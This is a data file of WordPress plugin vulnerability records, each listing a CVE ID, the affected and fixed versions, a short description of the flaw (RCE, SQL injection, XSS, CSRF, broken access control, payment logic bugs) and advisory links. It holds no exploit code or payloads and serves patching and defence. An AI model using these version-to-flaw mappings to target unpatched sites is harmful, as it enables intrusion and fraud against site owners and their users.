{"CVE_ID":"CVE-2023-6743","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.89","versionEndExcluding":"1.5.91","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.5.89 via the template import functionality. This makes it possible for authenticated attackers, with contributor access and above, to execute code on the server.","recommendation":"Update to version 1.5.91, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25f71a19-85b1-4bc9-b193-d9de2eba81ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25f71a19-85b1-4bc9-b193-d9de2eba81ee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_output.class.php#L1765\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_output.class.php#L1765\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/provider\\\/core\\\/plugins\\\/unlimited_elements\\\/elementor\\\/elementor_widget.class.php#L3948\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/provider\\\/core\\\/plugins\\\/unlimited_elements\\\/elementor\\\/elementor_widget.class.php#L3948\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010986\\\/unlimited-elements-for-elementor#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010986\\\/unlimited-elements-for-elementor#file6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3015166\\\/unlimited-elements-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3015166\\\/unlimited-elements-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-46644","slug":"easy-sticky-sidebar","versionImpact":"1.5.8","versionEndExcluding":"1.5.9","description":"Missing Authorization vulnerability in WP CTA PRO WordPress CTA allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WordPress CTA: from n\/a through 1.5.8.","recommendation":"Update to version 1.5.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-sticky-sidebar\\\/vulnerability\\\/wordpress-wordpress-cta-wordpress-call-to-action-sticky-cta-floating-buttons-floating-tab-plugin-plugin-1-5-6-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-sticky-sidebar\\\/vulnerability\\\/wordpress-wordpress-cta-wordpress-call-to-action-sticky-cta-floating-buttons-floating-tab-plugin-plugin-1-5-6-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12109","slug":"aco-product-labels-for-woocommerce","versionImpact":"1.5.8","versionEndExcluding":"1.5.9","description":"The Product Labels For Woocommerce (Sale Badges) WordPress plugin before 1.5.9 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 1.5.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2eca2f88-c843-4794-8cd9-46f17c92753a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2eca2f88-c843-4794-8cd9-46f17c92753a\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2eca2f88-c843-4794-8cd9-46f17c92753a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2eca2f88-c843-4794-8cd9-46f17c92753a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0492","slug":"gs-woocommerce-products-slider","versionEndExcluding":"1.5.9","description":"The GS Products Slider for WooCommerce WordPress plugin before 1.5.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea3b129d-32d8-40e3-b1af-8b92a760db23\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea3b129d-32d8-40e3-b1af-8b92a760db23\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6828","slug":"arforms-form-builder","versionImpact":"1.5.8","versionEndExcluding":"1.5.9","description":"The Contact Form, Survey & Popup Form Plugin for WordPress \u2013 ARForms Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018arf_http_referrer_url\u2019 parameter in all versions up to, and including, 1.5.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e349cae-a996-4a32-807a-a98ebcb01edd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e349cae-a996-4a32-807a-a98ebcb01edd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3013347@arforms-form-builder\\\/trunk&old=2998602@arforms-form-builder\\\/trunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3013347@arforms-form-builder\\\/trunk&old=2998602@arforms-form-builder\\\/trunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-35720","slug":"new-album-gallery","versionImpact":"1.5.7","versionEndExcluding":"1.5.8","description":"Missing Authorization vulnerability in A WP Life Album Gallery \u2013 WordPress Gallery. This issue affects Album Gallery \u2013 WordPress Gallery: from n\/a through 1.5.7.","recommendation":"Update to version 1.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/new-album-gallery\\\/wordpress-album-gallery-wordpress-gallery-plugin-1-5-7-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/new-album-gallery\\\/wordpress-album-gallery-wordpress-gallery-plugin-1-5-7-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8787","slug":"clover-online-orders","versionImpact":"1.5.7","versionEndExcluding":"1.5.8","description":"The Smart Online Order for Clover plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.5.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35d64d3e-b48e-4e35-ab1d-0557fcd62263?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35d64d3e-b48e-4e35-ab1d-0557fcd62263?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/tags\\\/1.5.7\\\/admin\\\/moo-OnlineOrders-admin.php#L477\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/tags\\\/1.5.7\\\/admin\\\/moo-OnlineOrders-admin.php#L477\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/tags\\\/1.5.7\\\/admin\\\/includes\\\/class-moo-products-list.php#L572\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/tags\\\/1.5.7\\\/admin\\\/includes\\\/class-moo-products-list.php#L572\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168446\\\/clover-online-orders\\\/tags\\\/1.5.8\\\/admin\\\/includes\\\/class-moo-products-list.php?old=3142847&old_path=clover-online-orders%2Ftags%2F1.5.7%2Fadmin%2Fincludes%2Fclass-moo-products-list.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168446\\\/clover-online-orders\\\/tags\\\/1.5.8\\\/admin\\\/includes\\\/class-moo-products-list.php?old=3142847&old_path=clover-online-orders%2Ftags%2F1.5.7%2Fadmin%2Fincludes%2Fclass-moo-products-list.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168446\\\/clover-online-orders\\\/tags\\\/1.5.8\\\/admin\\\/moo-OnlineOrders-admin.php?old=3142847&old_path=clover-online-orders%2Ftags%2F1.5.7%2Fadmin%2Fmoo-OnlineOrders-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168446\\\/clover-online-orders\\\/tags\\\/1.5.8\\\/admin\\\/moo-OnlineOrders-admin.php?old=3142847&old_path=clover-online-orders%2Ftags%2F1.5.7%2Fadmin%2Fmoo-OnlineOrders-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51681","slug":"duplicator","versionImpact":"1.5.7","versionEndExcluding":"1.5.7.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in Duplicator Duplicator \u2013 WordPress Migration & Backup Plugin. This issue affects Duplicator \u2013 WordPress Migration & Backup Plugin: from n\/a through 1.5.7.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/duplicator\\\/wordpress-duplicator-plugin-1-5-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/duplicator\\\/wordpress-duplicator-plugin-1-5-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1894","slug":"burst-statistics","versionImpact":"1.5.6.1","versionEndExcluding":"1.5.7","description":"The Burst Statistics \u2013 Privacy-Friendly Analytics for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'burst_total_pageviews_count' custom meta field in all versions up to, and including, 1.5.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that this exploit only functions if the victim has the 'Show Toolbar when viewing site' option enabled in their profile.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa587df5-9d96-4cac-ae5d-2a0485a3a789?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa587df5-9d96-4cac-ae5d-2a0485a3a789?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/class-frontend.php#L67\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/class-frontend.php#L67\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/class-frontend.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/class-frontend.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/burst-statistics\\\/tags\\\/1.5.6.1&old=3049793&new_path=\\\/burst-statistics\\\/tags\\\/1.5.7&new=3049793&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/burst-statistics\\\/tags\\\/1.5.6.1&old=3049793&new_path=\\\/burst-statistics\\\/tags\\\/1.5.7&new=3049793&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7747","slug":"woo-wallet","versionImpact":"1.5.6","versionEndExcluding":"1.5.7","description":"The Wallet for WooCommerce plugin for WordPress is vulnerable to incorrect conversion between numeric types in all versions up to, and including, 1.5.6. This is due to a numerical logic flaw when transferring funds to another user. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create funds during a transfer and distribute these funds to any number of other users or their own account, rendering products free. Attackers could also request to withdraw funds if the Wallet Withdrawal extension is used and the request is approved by an administrator.","recommendation":"Update to version 1.5.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-wallet\\\/trunk\\\/includes\\\/class-woo-wallet-frontend.php#L407\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-wallet\\\/trunk\\\/includes\\\/class-woo-wallet-frontend.php#L407\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145131\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145131\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd8f3eb7-ac60-46c4-b41f-5d89e3133042?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd8f3eb7-ac60-46c4-b41f-5d89e3133042?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1080","slug":"gn-publisher","versionEndExcluding":"1.5.6","description":"The GN Publisher plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018tab\u2019 parameter in versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a4ee97c-63cd-4a5e-a112-6d4c4c627a57\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a4ee97c-63cd-4a5e-a112-6d4c4c627a57\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gn-publisher\\\/trunk\\\/templates\\\/settings.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gn-publisher\\\/trunk\\\/templates\\\/settings.php#L70\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7574","slug":"christmasify","versionImpact":"1.5.5","versionEndExcluding":"1.5.6","description":"The Christmasify! plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.5. This is due to missing nonce validation on the 'options' function. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac247d3a-9e60-431e-ac98-2601e9907758?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac247d3a-9e60-431e-ac98-2601e9907758?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132621\\\/christmasify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132621\\\/christmasify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12263","slug":"orbisius-child-theme-creator","versionImpact":"1.5.5","versionEndExcluding":"1.5.6","description":"The Child Theme Creator by Orbisius plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the cloud_delete() and cloud_update() functions in all versions up to, and including, 1.5.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update and delete cloud snippets. Please note that this vulnerability was present in the Cloud Library Addon used by the plugin and not in the plugin itself, the cloud library has been removed entirely.","recommendation":"Update to version 1.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205672%40orbisius-child-theme-creator&new=3205672%40orbisius-child-theme-creator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205672%40orbisius-child-theme-creator&new=3205672%40orbisius-child-theme-creator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd0eb569-b526-48bd-8198-ff883860e040?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd0eb569-b526-48bd-8198-ff883860e040?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0710","slug":"gp-unique-id","versionImpact":"1.5.5","versionEndExcluding":"1.5.6","description":"The GP Unique ID plugin for WordPress is vulnerable to Unique ID Modification in all versions up to, and including, 1.5.5. This is due to insufficient input validation. This makes it possible for unauthenticated attackers to tamper with the generation of a unique ID on a form submission and replace the generated unique ID with a user-controlled one, leading to a loss of integrity in cases where the ID's uniqueness is relied upon in a security-specific context.","recommendation":"Update to version 1.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26db2d25-01b8-49c5-a4d6-284780ac97bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26db2d25-01b8-49c5-a4d6-284780ac97bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/gravitywiz.com\\\/documentation\\\/gravity-forms-unique-id\\\/\",\"name\":\"https:\\\/\\\/gravitywiz.com\\\/documentation\\\/gravity-forms-unique-id\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-0710\\\/blob\\\/main\\\/README.md\",\"name\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-0710\\\/blob\\\/main\\\/README.md\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10101","slug":"google-analytics-top-posts-widget","versionImpact":"1.5.5","versionEndExcluding":"1.5.6","description":"A vulnerability classified as problematic was found in Google Analytics Top Content Widget Plugin up to 1.5.6 on WordPress. Affected by this vulnerability is an unknown functionality of the file class-tgm-plugin-activation.php. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.5.7 is able to address this issue. The name of the patch is 25bb1dea113716200a6f0f3135801d84a7a65540. It is recommended to upgrade the affected component. The identifier VDB-226117 was assigned to this vulnerability.","recommendation":"Update to version 1.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.226117\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.226117\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/google-analytics-top-posts-widget\\\/commit\\\/25bb1dea113716200a6f0f3135801d84a7a65540\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/google-analytics-top-posts-widget\\\/commit\\\/25bb1dea113716200a6f0f3135801d84a7a65540\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.226117\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.226117\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4360","slug":"controlled-admin-access","versionEndExcluding":"1.5.6","description":"The Controlled Admin Access plugin for WordPress is vulnerable to Privilege Escalation in versions up to, and including, 1.5.5 by not properly restricting access to the configuration page. This makes it possible for attackers to create a new administrator role with unrestricted access.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ddc0a9d-c081-4bef-aa87-3b10d037379c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ddc0a9d-c081-4bef-aa87-3b10d037379c\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-controlled-admin-access-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-controlled-admin-access-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c57211a-f59d-4379-b09e-7c6049a6b04d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c57211a-f59d-4379-b09e-7c6049a6b04d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/controlled-admin-access\\\/trunk\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/controlled-admin-access\\\/trunk\\\/readme.txt\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36710","slug":"wps-hide-login","versionEndExcluding":"1.5.5","description":"The WPS Hide Login plugin for WordPress is vulnerable to login page disclosure even when the settings of the plugin are set to hide the login page making it possible for unauthenticated attackers to brute force credentials on sites in versions up to, and including, 1.5.4.2.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7808329f-1688-480c-a83c-c4ab2fa86da6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7808329f-1688-480c-a83c-c4ab2fa86da6?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-wps-hide-login-fixed-security-issue\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-wps-hide-login-fixed-security-issue\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13407","slug":"omnipress","versionImpact":"1.5.4","versionEndExcluding":"1.5.5","description":"The Omnipress plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.5.4 via the megamenu block due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 1.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254484\\\/omnipress\\\/trunk\\\/includes\\\/Blocks\\\/BlockTypes\\\/Megamenu.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254484\\\/omnipress\\\/trunk\\\/includes\\\/Blocks\\\/BlockTypes\\\/Megamenu.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa17f78a-5e4a-441e-bbbb-d13bad648c39?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa17f78a-5e4a-441e-bbbb-d13bad648c39?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2661","slug":"barcode-scanner-lite-pos-to-manage-products-inventory-and-orders","versionImpact":"1.5.4","versionEndExcluding":"1.5.5","description":"The Barcode Scanner and Inventory manager. POS (Point of Sale) \u2013 scan barcodes & create orders with barcode reader. plugin for WordPress is vulnerable to blind SQL Injection via the \u2018currentIds\u2019 parameter in all versions up to, and including, 1.5.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c8ba503-db7e-4ac1-898f-a301854db60f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c8ba503-db7e-4ac1-898f-a301854db60f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders\\\/trunk\\\/src\\\/Core.php#L621\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders\\\/trunk\\\/src\\\/Core.php#L621\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3074826%40barcode-scanner-lite-pos-to-manage-products-inventory-and-orders%2Ftrunk&old=3048878%40barcode-scanner-lite-pos-to-manage-products-inventory-and-orders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3074826%40barcode-scanner-lite-pos-to-manage-products-inventory-and-orders%2Ftrunk&old=3048878%40barcode-scanner-lite-pos-to-manage-products-inventory-and-orders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6025","slug":"order-tip-woo","versionImpact":"1.5.4","versionEndExcluding":"1.5.5","description":"The Order Tip for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Improper Input Validation in all versions up to, and including, 1.5.4. This is due to lack of server-side validation on the `data-tip` attribute, which makes it possible for unauthenticated attackers to apply an excessive or even negative tip amount, resulting in unauthorized discount up to free orders depending on the value submitted.","recommendation":"Update to version 1.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tip-woo\\\/trunk\\\/assets\\\/build\\\/front.bundle.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tip-woo\\\/trunk\\\/assets\\\/build\\\/front.bundle.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tip-woo\\\/trunk\\\/frontend\\\/views\\\/tip-form.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tip-woo\\\/trunk\\\/frontend\\\/views\\\/tip-form.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3318615%40order-tip-woo&new=3318615%40order-tip-woo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3318615%40order-tip-woo&new=3318615%40order-tip-woo&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bcd18bd-032e-4a97-83aa-a377f9b1f435?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bcd18bd-032e-4a97-83aa-a377f9b1f435?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24432","slug":"woocommerce-ajax-filters","versionImpact":"1.5.4.6","versionEndExcluding":"1.5.4.7","description":"The Advanced AJAX Product Filters WordPress plugin does not sanitise the 'term_id' POST parameter before outputting it in the page, leading to reflected Cross-Site Scripting issue.","recommendation":"Update to version 1.5.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b92ec5f7-d6a8-476f-a01e-21001a558914\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b92ec5f7-d6a8-476f-a01e-21001a558914\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
